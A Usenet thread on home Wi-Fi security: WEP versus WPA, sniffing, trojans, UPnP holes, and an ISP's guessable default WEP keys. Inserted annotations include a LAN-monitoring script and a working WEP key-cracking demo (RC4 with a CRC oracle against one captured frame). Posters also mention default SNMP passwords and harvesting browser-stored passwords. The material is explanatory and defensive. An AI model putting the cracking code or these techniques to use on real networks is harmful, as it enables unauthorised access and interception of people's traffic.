I've had WEP encryption set up in my home network for more than a
year. Only some days ago I gave WPA a try, just out of curiosity
and maybe to learn something. The reason for me not doing it
before is that I don't feel it's such a horrible thing if my
neighbour uses my internet connection to do some web surfing and
check mail, for instance.
Now, I read somewhere that the threat could be somebody gaining
access to my computer and therefore doing all sort of things with
it. I don't know whether to believe this. Wouldn't an attacker
still need my root/user password to get any further? I don't share
files between computers, could somebody still do something through
some open ports I have for some applications? Is there a reason to
be worried, beyond the less important case of an occasional freeloader?
On Jun 11, 1:05 pm, Jose Rodriguez <josec.rodrig...@gmail.com> wrote:
> Hello
>
> I've had WEP encryption set up in my home network for more than a
> year. Only some days ago I gave WPA a try, just out of curiosity
> and maybe to learn something. The reason for me not doing it
> before is that I don't feel it's such a horrible thing if my
> neighbour uses my internet connection to do some web surfing and
> check mail, for instance.
>
> Now, I read somewhere that the threat could be somebody gaining
> access to my computer and therefore doing all sort of things with
> it. I don't know whether to believe this. Wouldn't an attacker
> still need my root/user password to get any further? I don't share
> files between computers, could somebody still do something through
> some open ports I have for some applications?
Bingo! You hit it. And if a NAT f/w prevents hosts "out there" from
accessing such ip/port, like with properly secured access, you've
removed one threat dimension.
Your ISP may not be thrilled if you're providing neighborhood
hot-spot, either.
J
>Is there a reason to
> be worried, beyond the less important case of an occasional freeloader?
>
> Regards
Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>I've had WEP encryption set up in my home network for more than a
>year. Only some days ago I gave WPA a try, just out of curiosity
>and maybe to learn something. The reason for me not doing it
>before is that I don't feel it's such a horrible thing if my
>neighbour uses my internet connection to do some web surfing and
>check mail, for instance.
Right. Now how would you know if your neighbor is using your system?
How would you know that they're using it to surf the web, and not to
hack into your system, or to spew spam? Got any monitoring in place?
>Now, I read somewhere that the threat could be somebody gaining
>access to my computer and therefore doing all sort of things with
>it.
Not really. All they want is enough information to pull off an
identity theft. They don't need to hack into your machine to do that.
Simply sniffing your traffic and extracting your unencrypted email is
usually sufficient. The only thing that's stopping someone is your
WEP encryption, which can be cracked in a few minutes. Note that they
don't need to enter your network or dig through your computer, just
sniff the traffic.
>I don't know whether to believe this.
Mostly true. A determined hacker could enter your computer via the
wireless and pull out some emailed bank statements, credit card
payment statements, saved passwords, and whatever else looks
interesting. At wireless speeds, they could copy most of the junk
under My Documents and various email depositories fairly quickly, and
inspect them at their leisure. Meanwhile, they could leave you with a
virus, not because they're malevolent, but simply to distract you.
>Wouldn't an attacker
>still need my root/user password to get any further?
They would need some way to get past your NAT and firewall. That's
not a trivial exercise. However MS makes it easier by punching holes
in the firewall with UPnP. Other applications add additional holes in
the firewall until it looks like Swiss cheese. Remote control and
tech support applications are a fair candidate for an external attack.
However, that's usually too sloppy and too much work. It's much
easier to trick you into installing some remote control software on
your machine, and then taking over control from the outside. Those
are called Trojan Horse programs and are the basis of most of the
"BotNet" systems that are spewing spam and precipitating DDOS attacks.
If someone can get you to install or run one of these apps, using
"social engineering", there's no need for them to try to get past your
firewall.
>I don't share
>files between computers, could somebody still do something through
>some open ports I have for some applications?
Oh yes, but it would usually require a security vulnerability in some
application that uses that open port to take advantage of it. There
are plenty such vulnerabilities out there, but they usually get
patched and fixed fairly quickly. However, the trojan horse problem
doesn't require a buggy application and will work quite nicely on a
perfectly functional computah.
>Is there a reason to
>be worried, beyond the less important case of an ocasional freeloader?
Yes. The real worry is someone sniffing your traffic and pulling off
an identity theft. That's why you need and should use WPA or WPA2.
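The reply above asks how you would even know whether a neighbour is on your LAN. One cheap answer, added here as an example (it is not code from the thread and not any router vendor's tool): keep an allow-list of your own devices' MAC addresses and compare it against the router's DHCP lease file. The lease lines below are constructed sample data in dnsmasq's lease-file format (`<expiry> <mac> <ip> <hostname> <client-id>`), and the MAC addresses and hostnames are made up. Note that this is monitoring, not access control: a MAC address is trivially spoofed, so a match tells you nothing, but a non-match is worth a look.

```python
"""Spot devices on a home LAN that are not on your own allow-list.

Added example, not part of the original thread. Parses a dnsmasq-style
lease file (constructed sample below) and reports every lease whose MAC
is not in KNOWN_MACS. The MACs and hostnames are invented.
"""
import re
from dataclasses import dataclass

# Your own hardware (assumed values for the example).
KNOWN_MACS = {
    "00:16:cb:aa:bb:01",  # laptop
    "00:1b:63:cc:dd:02",  # partner's Vista box
}

# Constructed sample lease file: two known devices and one stranger.
SAMPLE_LEASES = """\
1181580000 00:16:cb:aa:bb:01 192.168.1.10 jose-laptop 01:00:16:cb:aa:bb:01
1181580120 00:1b:63:cc:dd:02 192.168.1.11 vista-pc 01:00:1b:63:cc:dd:02
1181580300 00:0c:29:12:34:56 192.168.1.12 * *
"""

LEASE_RE = re.compile(
    r"^(\d+)\s+([0-9a-f:]{17})\s+(\S+)\s+(\S+)\s+(\S+)$", re.IGNORECASE
)


@dataclass(frozen=True)
class Lease:
    expiry: int
    mac: str
    ip: str
    hostname: str


def parse_leases(text):
    """Return a Lease per well-formed line; malformed lines are skipped, not fatal."""
    leases = []
    for line in text.splitlines():
        m = LEASE_RE.match(line.strip())
        if not m:
            continue
        leases.append(Lease(int(m.group(1)), m.group(2).lower(), m.group(3), m.group(4)))
    return leases


def unknown_devices(leases, known=KNOWN_MACS):
    """Leases whose MAC is not on the allow-list (case-insensitive compare)."""
    known_lc = {k.lower() for k in known}
    return [lease for lease in leases if lease.mac not in known_lc]


if __name__ == "__main__":
    # On a real router you would read /var/lib/misc/dnsmasq.leases (assumed path) instead.
    for lease in unknown_devices(parse_leases(SAMPLE_LEASES)):
        print(f"UNKNOWN {lease.mac} {lease.ip} hostname={lease.hostname}")
```

Run it from cron against the live lease file and mail yourself the output when it is non-empty; that is the minimum "monitoring in place" the reply is asking about.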
Jeff Liebermann wrote:
> Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>> [...]I don't feel as such a horrible thing if my
>> neighbour uses my internet connection to do some web surfing and
>> check mail, for instance.
>
> Right. Now how would you know if your neighbor is using your system?
> How would you know that they're using it to surf the web, and not to
> hack into your system, or to spew spam? Got any monitoring in place?
>
You're right, and another problem has been pointed out to me: what if
somebody is using your system for illegal purposes you might end up
getting the blame for? (although it would be quite stupid to use
next door's connection to download child pornography, but who knows).
>> Now, I read somewhere that the threat could be somebody gaining
>> access to my computer and therefore doing all sort of things with
>> it.
>
> Not really. All they want is enough information to pull off an
> identity theft. They don't need to hack into your machine to do that.
> Simply sniffing your traffic and extracting your unencrypted email is
> usually sufficient. The only thing that's stopping someone is your
> WEP encryption, which can be cracked in a few minutes. Note that they
> don't need to enter your network or dig through your computer, just
> sniff the traffic.
>
I haven't thought about that, it is worrying.
>> I don't know whether to believe this.
>
> Mostly true. A determined hacker could enter your computer via the
> wireless and pull out some emailed bank statements, credit card
> payment statements, saved passwords, and whatever else looks
> interesting. At wireless speeds, they could copy most of the junk
> under My Documents and various email depositories fairly quickly, and
> inspect them at their leisure. Meanwhile, they could leave you with a
> virus, not because they're malevolent, but simply to distract you.
>
That's serious, but for that to work you have to leave things
open and clear; I would only store passwords in an encrypted
format and a rather obscure location. And at least online banking
is done through a secure connection, isn't it?
>> Wouldn't an attacker
>> still need my root/user password to get any further?
>
> They would need some way to get past your NAT and firewall. That's
> not a trivial exercise. However MS makes it easier by punching holes
> in the firewall with UPnP. Other applications add additional holes in
> the firewall until it looks like Swiss cheese. Remote control and
> tech support applications are a fair candidate for an external attack.
>
> However, that's usually too sloppy and too much work. It's much
> easier to trick you into installing some remote control software on
> your machine, and then taking over control from the outside. Those
> are called Trojan Horse programs and are the basis of most of the
> "BotNet" systems that are spewing spam and precipitating DDOS attacks.
> If someone can get you to install or run one of these apps, using
> "social engineering", there's no need for them to try to get past your
> firewall.
I guess that's one of the reasons why Linux is inherently more
secure than Windows--software comes from digitally signed, official
repositories, for instance. On the other hand, I still have to
worry about things like remote registry, UPnP, remote assistance,
server service, etc., since my partner runs Vista...it's so boring
doing these things.
>
>> I don't share
>> files between computers, could somebody still do something through
>> some open ports I have for some applications?
>
> Oh yes, but it would usually require a security vulnerability in some
> application that uses that open port to take advantage of it. There
> are plenty such vulnerabilities out there, but they usually get
> patched and fixed fairly quickly. However, the trojan horse problem
> doesn't require a buggy application and will work quite nicely on a
> perfectly functional computah.
After this and some other posts on another list I believe I get the
idea of the open ports thing. I just didn't get how it would be
possible to get through something that wasn't intended to let you.
>
>> Is there a reason to
>> be worried, beyond the less important case of an ocasional freeloader?
>
> Yes. The real worry is someone sniffing your traffic and pulling off
> an identity theft. That's why you need and should use WPA or WPA2.
Well, I'm convinced, I'll stick with my WPA2 thing, making sure the
password is strong enough.
Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>You're right, and another problem has been pointed out to me: what if
>somebody is using your system for illegal purposes you might end up
>getting the blame for?
It's possible, but (to the best of my knowledge) it hasn't happened
yet. There have been some arrests and stupid convictions for using a
wireless connection without permission, but none for anything
involving liability. The whole issue of responsibility for wireless
security is currently unclear and I am NOT an expert or attorney.
However, I suggest you do whatever it takes to not become a test case.
>> Mostly true. A determined hacker could enter your computer via the
>> wireless and pull out some emailed bank statements, credit card
>> payment statements, saved passwords, and whatever else looks
>> interesting. At wireless speeds, they could copy most of the junk
>> under My Documents and various email depositories fairly quickly, and
>> inspect them at their leisure. Meanwhile, they could leave you with a
>> virus, not because they're malevolent, but simply to distract you.
>>
>That's serious, but for that to work you have to leave things
>open and clear; I would only store passwords in an encrypted
>format and a rather obscure location. And at least online banking
>is done through a secure connection, isn't it?
There are multiple levels of protection. The most obvious is to
encrypt the wireless traffic so that nobody enters your LAN in the
first place. That's the WPA and WPA2 encryption.
However, if someone can enter via wireless, what other defenses do you
have? If you have shared folders, are they open to anyone to read or
are they password protected? Do you have intrusion detection software
running? Do you use encrypted folders (XP Pro only)? Are the
documents themselves encrypted? Can they be copied, even if they are
encrypted?
The last is fairly important. Most people assume that a document with
simple encryption is safe. That really depends on the level of
encryption and the time allowed. The encryption used may be
relatively secure if I had a limited amount of time to recover the
key. However, if I can copy the encrypted file to my own machine, I
can do a brute force or better crack at my leisure. That would
require a more secure system. I've also found that most users tend to
use the same password for ALL their encrypted documents, so cracking
one will usually crack them all. Note the number of "password
recovery" programs and services available:
<http://www.crackpassword.com>
<http://www.lostpassword.com>
etc.
My personal solution is to NOT store anything of value on the machine.
The really important stuff is on a removable USB thumb drive. It's
also encrypted, password protected, and backed up with a copy
somewhere. Not ideal, but with the whole neighborhood on my
neighborhood wireless LAN, it's prudent.
>I guess that's one of the reasons why Linux is inherently more
>secure than Windows--software comes from digitally signed, official
>repositories, for instance.
Nope. There are distributions that come that way, but most of the
stuff I run isn't. The stuff I've seen that is signed, is self
authenticating and does not use an independent certificate authority.
Therefore, it could be forged. Improbable, but possible.
The major difference between Linux and Windoze security is philosophy.
Linux usually comes secure by default with all the security features
enabled on installation. If you want to do something disgusting, then
you have to do it intentionally. Windoze is built for user
convenience and requires the user to implement and apply security. At
least that's the way they started. Both extremes found that they had
to compromise somewhat in order to make their products usable. Linux
is becoming more permissive on installation and Windoze at least
implements basic password security on installation. Since there's no
"right answer", the issue will continue to be a moving target. Also,
just because the vendor delivers a product that's more convenient than
secure, doesn't mean you have to perpetuate the mistake.
Unfortunately, the wireless router industry has done the worst
possible thing. Most wireless routers are wide open and totally
insecure on installation. Open the box, plug it in, and in most
cases, it will function. That's a great OBE (out of box experience)
but doesn't make for a very secure system. Eventually, someone will
sue a wireless router manufacturer for damages resulting from the
false perception of security, and things might change. Meanwhile,
only 2-wire has gotten the clue and delivers their routers secure by
default. Again, just because the router manufacturers deliver
insecure products, doesn't mean that you have to perpetuate the
mistake.
Jeff Liebermann wrote:
> Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>>> [...] [A] determined hacker could enter your computer via the
>>> wireless and pull out some emailed bank statements, credit card
>>> payment statements, saved passwords, and whatever else looks
>>> interesting. At wireless speeds, they could copy most of the junk
>>> under My Documents and various email depositories fairly quickly, and
>>> inspect them at their leisure. [...]
>>>
>> That's serious, but for that to work you have to leave things
>> open and clear; I would only store passwords in an encrypted
>> format and a rather obscure location. And at least online banking
>> is done through a secure connection, isn't it?
>
> There are multiple levels of protection. The most obvious is to
> encrypt the wireless traffic so that nobody enters your LAN in the
> first place. That's the WPA and WPA2 encryption.
>
> However, if someone can enter via wireless, what other defenses do you
> have? If you have shared folders, are they open to anyone to read or
> are they password protected? Do you have intrusion detection software
> running? Do you use encrypted folders (XP Pro only)? Are the
> documents themselves encrypted? Can they be copied, even if they are
> encrypted?
>
> The last is fairly important. Most people assume that a document with
> simple encryption is safe. That really depends on the level of
> encryption and the time allowed. The encryption used may be
> relatively secure if I had a limited amount of time to recover the
> key. However, if I can copy the encrypted file to my own machine, I
> can do a brute force or better crack at my leisure. That would
> require a more secure system. I've also found that most users tend to
> use the same password for ALL their encrypted documents, so cracking
> one will usually crack them all. Note the number of "password
> recovery" programs and services available:
> <http://www.crackpassword.com>
> <http://www.lostpassword.com>
> etc.
>
> My personal solution is to NOT store anything of value on the machine.
> The really important stuff is on a removable USB thumb drive. It's
> also encrypted, password protected, and backed up with a copy
> somewhere. Not ideal, but with the whole neighborhood on my
> neighborhood wireless LAN, it's prudent.
I totally agree; when I said "I would" I meant exactly that, i.e.
that I would do it that way if I had to. An online banking password
stored in your computer is probably a way of looking for potential
trouble. On the other hand, being realistic, I don't think that
anybody would scan my hard drive to afterwards do a brute force
attack on some suspiciously encrypted strings of text trying to
find out whether they find anything interesting--unless they were
pretty sure that they could find it, which is obviously not the
case, since I am not (and I don't look like) a very wealthy person.
Applying the same reasoning, I don't hold (and I don't look like I
do) any extra important and sensitive information somebody could
make any profit out of. Let's face it, for the average
Joe--like myself--some of the precautions available out there are
overkill. The same, obviously, does not apply to the corporate
world, and knowing how to protect your digital data is, in any
case, highly recommendable.
>
>> I guess that's one of the reasons why Linux is inherently more
>> secure than Windows--software comes from digitally signed, official
>> repositories, for instance.
>
> Nope. There are distributions that come that way, but most of the
> stuff I run isn't. The stuff I've seen that is signed, is self
> authenticating and does not use an independent certificate authority.
> Therefore, it could be forged. Improbable, but possible.
A similar issue arose on another list when somebody asked how
reliable, in terms of security, SE Linux can possibly be, given
that it was first developed by the NSA. I agree with some of the
opinions given there in that, at the end of the day, you will
always have to rely on somebody unless you develop your own OS and
your own software--and you don't connect to the internet unless you
have your own ISP business, FWIW. I don't know what you run, but
there is a qualitative difference between installing something that
came from an official signed repository (yes, you have to rely on,
say, Debian developers) and running the latest supercool screensaver
or useless utility (as many Windows users do, not to mention
warez). Another point is the difference between open source and
closed source. I'll give you an example: some time ago I downloaded
and installed VMWare and it all went fine, but I found the
advertising mail they used to send me somewhat annoying. At some
point I installed Samba to share files between my Linux and my
virtual XP machine, with the consequence of receiving an e-mail
immediately afterwards selling me the goodness of VMWare products
connected through Samba servers...I may be seeing ghosts here, I
don't know.
>
> The major difference between Linux and Windoze security is philosophy.
> Linux usually comes secure by default with all the security features
> enabled on installation. If you want to do something disgusting, then
> you have to do it intentionally. Windoze is built for user
> convenience and requires the user to implement and apply security. At
> least that's the way they started. Both extremes found that they had
> to compromise somewhat in order to make their products usable. Linux
> is becoming more permissive on installation and Windoze at least
> implements basic password security on installation. Since there's no
> "right answer", the issue will continue to be a moving target. Also,
> just because the vendor delivers a product that's more convenient than
> secure, doesn't mean you have to perpetuate the mistake.
>
Spot on, I guess, but how many users don't do anything about
anything with their systems? I myself, when on windows used to
close down everything I could to avoid potential risks, as well as
keeping a bare minimum set of security standards like setting
separate unprivileged accounts, firewall, antivirus, antispyware
and so on, and yet didn't bother to set up WPA till a couple of
weeks ago out of pure laziness and ignorance.
> Unfortunately, the wireless router industry has done the worst
> possible thing. Most wireless routers are wide open and totally
> insecure on installation. Open the box, plug it in, and in most
> cases, it will function. That's a great OBE (out of box experience)
> but doesn't make for a very secure system. Eventually, someone will
> sue a wireless router manufacturer for damages resulting from the
> false perception of security, and things might change. Meanwhile,
> only 2-wire has gotten the clue and delivers their routers secure by
> default. Again, just because the router manufacturers deliver
> insecure products, doesn't mean that you have to perpetuate the
> mistake.
>
One terrific example of a worst-case scenario I know of takes place in
Spain. Company X sells these nice wireless routers that come
with their internet package. User Y believes he's safe because it
came with encryption, and that sounds cool. What Y probably does
not know is that the default SSID of every X router is something
like "WLAN ZW", ZW being, if I remember correctly, the last two
digits of the router's MAC address, and the WEP key being a
combination of the SSID and the whole MAC. Forget about injecting,
deauth, statistical attacks, whatever: one single data packet
gathered gives you the key after an extremely quick dictionary
search. I'd be quite angry if I were with company X.
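The post above says one captured data packet is enough to confirm a default key drawn from a tiny candidate list. The reason is that WEP's integrity check doubles as a key oracle: a frame is IV || RC4(IV || key, payload || CRC-32(payload)), so decrypting with a guessed key and checking the CRC tells you whether the guess was right, with no need for injection, deauthentication or statistical IV attacks. The following is an added example, not code from the thread. The thread does not give the ISP's real derivation rule, so `candidate_keys()` uses a made-up stand-in (hypothetical, for illustration only); the RC4 and ICV handling is the genuine WEP mechanism. The SSID, MAC and "captured" frame are constructed (the frame is produced by encrypting a sample payload under the victim's key).

```python
"""Verify predictable default WEP keys against a single captured frame.

Added example, not from the original thread. candidate_keys() is a
HYPOTHETICAL stand-in for an ISP's default-key rule; rc4/wep_* are the
real WEP primitives (RC4 over IV||key, CRC-32 ICV appended to payload).
"""
import struct
import zlib


def rc4(key, data):
    """Textbook RC4: key scheduling (KSA), then keystream generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _icv(payload):
    # WEP ICV: CRC-32 of the plaintext, little-endian, encrypted along with it
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key, iv, payload):
    """WEP data body: IV || RC4(IV||key, payload || ICV). Key-ID byte omitted."""
    return iv + rc4(iv + key, payload + _icv(payload))


def wep_try_key(key, frame):
    """Decrypt with a candidate key; return payload if the ICV verifies, else None."""
    iv, body = frame[:3], frame[3:]
    pt = rc4(iv + key, body)
    payload, icv = pt[:-4], pt[-4:]
    return payload if _icv(payload) == icv else None


PREFIXES = ("A", "B", "C", "D", "E", "F", "G", "H")  # invented part of the stand-in rule


def candidate_keys(ssid, mac):
    """HYPOTHETICAL default-key rule: 13-byte (104-bit) ASCII key built from a
    one-letter prefix, the SSID suffix and the MAC digits. Eight candidates in
    total, versus the 2**104 a randomly generated 104-bit key would require."""
    suffix = ssid.split("_")[-1]
    mac_hex = mac.replace(":", "").upper()
    for prefix in PREFIXES:
        yield (prefix + suffix + mac_hex)[:13].encode()


def crack_from_one_frame(ssid, mac, frame):
    """Return (key, payload, candidates_tried); key is None if none verified."""
    tried = 0
    for key in candidate_keys(ssid, mac):
        tried += 1
        payload = wep_try_key(key, frame)
        if payload is not None:
            return key, payload, tried
    return None, None, tried


if __name__ == "__main__":
    mac, ssid = "00:11:22:33:44:5A", "WLAN_5A"          # constructed victim router
    victim_key = list(candidate_keys(ssid, mac))[2]    # shipped with prefix "C" (assumed)
    # One "captured" data frame: LLC/SNAP header plus a few payload bytes, constructed.
    frame = wep_encrypt(victim_key, b"\x0a\x0b\x0c", b"\xaa\xaa\x03\x00\x00\x00\x08\x00sample")
    key, payload, tried = crack_from_one_frame(ssid, mac, frame)
    print(f"key={key!r} confirmed after {tried} candidates; payload={payload!r}")
```

A wrong key passes the CRC check with probability about 2^-32, so a single frame is a reliable oracle. The lesson for a router vendor is not "use a better rule" but "never derive the key from anything broadcast in the beacon"; the lesson for the user is that the WEP key on a sticker is only as secret as the rule that generated it.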
Jose Rodriguez <josec.rodriguez@gmail.com> hath wroth:
>On the other hand, being realistic, I don't think that
>anybody would scan my hard drive to afterwards do a brute force
>attack on some suspiciously encrypted strings of text trying to
>find out whether they find anything interesting
True. That takes too long. Just grab the Firefox or IE stored
passwords. That's where all the goodies are usually buried. Got a
bank account password saved in there?
<http://www.securityfocus.com/infocus/1882>
<http://www.securityfocus.com/infocus/1883>
>A similar issue arose in other list when somebody asked how
>reliable, in terms of security, can SE Linux possibly be, given
>that it was first developed by the NSA.
I would be happy just to have a CRC on the distribution so that I know
that it has been modified. Many large distributions do that, but
usually to determine if there's been download corruption, not as a
security check.
>point I installed Samba to share files between my Linux and my
>virtual XP machine, with the consequence of receiving an e-mail
>immediately afterwards selling me the goodness of VMWare products
>connected through Samba servers...I may be seeing ghosts here, I
>don't know.
It's probably true, but I'm too lazy to check the VMWare privacy
policy. My guess is that you have signed away some right for
them to obtain a list of installed applications in order to improve
their product quality. The road to hell is paved with the best of
intentions.
>Spot on, I guess, but how many users don't do anything about
>anything with their systems?
Shhhhsh. Don't tell anyone. That kind of user supplies the bulk of
my business. If they ever understood that they are personally
responsible for security, and not Microsoft, I would be out of
business. The company motto is "If this stuff worked, you wouldn't
need me".
>I myself, when on windows used to
>close down everything I could to avoid potential risks, as well as
>keeping a bare minimum set of security standards like setting
>separate unprivileged accounts, firewall, antivirus, antispyware
>and so on, and yet didn't bother to set up WPA till a couple of
>weeks ago out of pure laziness and ignorance.
Not me. I download, install, tinker, and often break just about
anything I find that's interesting. If it blows up, I restore with
various tools (ERUNT, system restore, DVD backup, etc). I want to
have things break on my machine before I inflict them on my customers.
Also, it adds to my experience level, which gives me a few days lead
time on the inevitable questions from customers.
The one exception is my office bookkeeping machine. It's almost
totally isolated from the rest of the LAN and WAN. It does connect to
the internet for updates, but only briefly. I have mirrored backups,
encrypted filesystems, and secure access. If it goes, so does my
business, so I'm very careful with it.
>Forget about injecting,
>deauth, statistical attacks whatsoever: one single data packet
>gathered gives you the key after an extremely quick dictionary
>search. I'd be quite angry if I was with company X.
Lovely. Don't forget about "back door" passwords and multiple points
of entry. For example, one very secure router forgot to change the
SNMP passwords and left them at the defaults of public and private.
Turn on SNMP, and the router is wide open. I can even change the
admin password via SNMP. Fortunately, that's been fixed, but it took
well over a year to convince them to do it.